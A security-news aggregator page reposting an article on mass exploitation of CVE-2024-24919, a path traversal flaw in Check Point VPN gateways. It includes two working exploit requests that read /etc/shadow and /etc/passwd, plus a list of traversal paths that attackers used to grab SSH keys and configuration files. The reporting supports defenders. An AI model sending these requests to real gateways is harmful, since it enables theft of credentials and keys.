Новости компьютерной безопасности:

  Latest News

Huge Surge in Attacks Exploiting Check Point VPN Zero-Day Vulnerability

С сайта: Zero-Day(cybersecuritynews.com)

Huge Surge in Attacks Exploiting Check Point VPN Zero-Day Vulnerability

Author: Dhivya

Check Point published an advisory regarding a critical vulnerability, CVE-2024-24919, which has since seen a surge in exploitation attempts.

The vulnerability, rated with a CVSS score of 8.6, allows attackers to access sensitive information on the Security Gateway, potentially leading to lateral movement and domain admin privileges.

CVE-2024-24919– The Vulnerability
According to Greynoise blogs, the core issue is a path traversal vulnerability.

This vulnerability allows an attacker to access files and directories stored outside the web root folder.

The specific exploit involves sending a crafted POST request to the server, which runs as root. This enables the attacker to grab any file on the filesystem.

The exploit, as reverse-engineered by both Check Point and watchTowr labs, looks like this:

POST /clients/MyCRL HTTP/1.1
Host:
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
Initial Discovery and Advisory
Check Point’s advisory, although somewhat vague, highlighted the severity of the vulnerability.

The advisory noted that exploiting this vulnerability could result in accessing sensitive information and potentially lead to domain admin privileges.

However, it was buried deep within the advisory that attacks in the wild had been occurring since April 7, 2024.

Two days after the advisory, on May 30, 2024, watchTowr labs published a detailed write-up, including a working proof of concept.

The Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2024-24919 to its Known Exploited Vulnerabilities list on the same day. By May 31, 2024, exploitation attempts were being observed globally.

Observations and Data
Sift, a cybersecurity monitoring tool, tagged the issue quickly. The first exploit attempt was logged on May 30, 2024, although it was a non-working exploit.

The first successful exploitation attempt was recorded on May 31, 2024, at around 9:30 AM UTC. The payload used in these attempts was identical to the proof of concept published by watchTowr labs.

A manual search of honeypot data revealed that the oldest exploit attempts started on May 30, 2024, at about 5 PM UTC.

These attempts, however, did not work, indicating that attackers were still refining their methods.

The first real exploitation was observed on May 31, 2024, from a New York-based IP address.

POST /clients/MyCRL HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 38
/clients/MyCRL/../../../..//etc/passwd
cyber security newsGraph showing the surge in exploitation attempts
Top Exploited Paths
As of June 4, 2024, the top-10 list of plausibly-working payloads observed includes:

  1. ../../../../../../../etc/fstab – 4805 attempts
  2. ../../../../../../../etc/shadow – 2453 attempts
  3. ../../../../../../../sysimg/CPwrapper/SU/Products.conf – 980 attempts
  4. ../../../../../../../config/db/initial – 959 attempts
  5. ../../../../../../../etc/passwd – 508 attempts
  6. ../../../../../../../home/*/.ssh/authorized_keys – 202 attempts
  7. ../../../../../../../opt/checkpoint/conf/ – 166 attempts
  8. ../../../../../../../etc/ssh/sshd_config – 165 attempts
  9. ../../../../../../../etc/vpn/vpn.conf – 163 attempts
  10. ../../../../../../../home/*/.ssh/id_rsa – 161 attempts

The rapid increase in exploitation attempts following the public disclosure of CVE-2024-24919 underscores the critical need for organizations to patch their systems promptly.

With a public proof of concept available and exploitation ramping up, all affected entities must apply the necessary patches to mitigate this severe vulnerability.



#Cyber_Security #Cyber_Security_News #Vulnerability #Zero-Day #cyber_security #cyber_security_news

Оригинальная версия на сайте: Huge Surge in Attacks Exploiting Check Point VPN Zero-Day Vulnerability
Вернуться к списку новостей К свежим новостям Здесь был google AdSense.
Вместо рекламы товаров началась политическая агитация.
Отключено до получения извинений.

Вернуться к списку новостей Здесь был google AdSense.
Вместо рекламы товаров началась политическая агитация.
Отключено до получения извинений.


Новости проекта CSN:

✉ CSN.net4me.net

Обновление сайта csn.net4me.net

Обновление сайта csn.net4me.net 💻
cyber security news
  • Физически мы переехали на новый сервер. Благодарим наших подписчиков и постоянных читателей за терпение и понимание.
  • Сайт csn.net4me.net полностью адаптирован для работы по шифрованному SSL соединению.
  • Изменен механизм обработки и отображения опасных и критических уязвимостей.

Благодарим что вы с нами.


#CSN_обновление_сайта
https://csn.net4me.net/cyber_security_8301.html

Дополнительный материал

О проекте CSN

Проект CSN.net4me.net родился 16 Марта 2018 года.
Проект находится в самом начале своего развития. Конечно оформление, наполнение будет меняться. Одно останется неизменным - самые свежие новости компьютерной и сетевой безопасности.

О проекте net4me

Проект net4me.net развивался как сборник готовых решений и документации по темам компьютерной безопасности, сетевых решений и СПО (в часности linux). Темпы развития IT отрасли оказались столь быстрыми, что некоторые знания, технологии и информация о них устаревали мгновенно. Тем не менее, некоторый материал net4me.net до сих пор востребован.

Об источниках

Новости берутся CSN из открытых и доступных каждому источников. Авторы проекта стараются подбирать авторитетные и проверенные источники. Но, тем не менее, не несут ответственности за содержимое новостей. В каждой новости указывается источник этой новости, её автор и ссылка на оригинал новости.

Информация

Если вы желаете чтобы новости вашего ресурса были размещены на сайте CSN, то свяжитесь с авторами проекта csn@net4me.net и предложите ссылку на rss или xml ленту новостей вашего ресурса. Любая предложенная информация будет рассмотрена редакцией.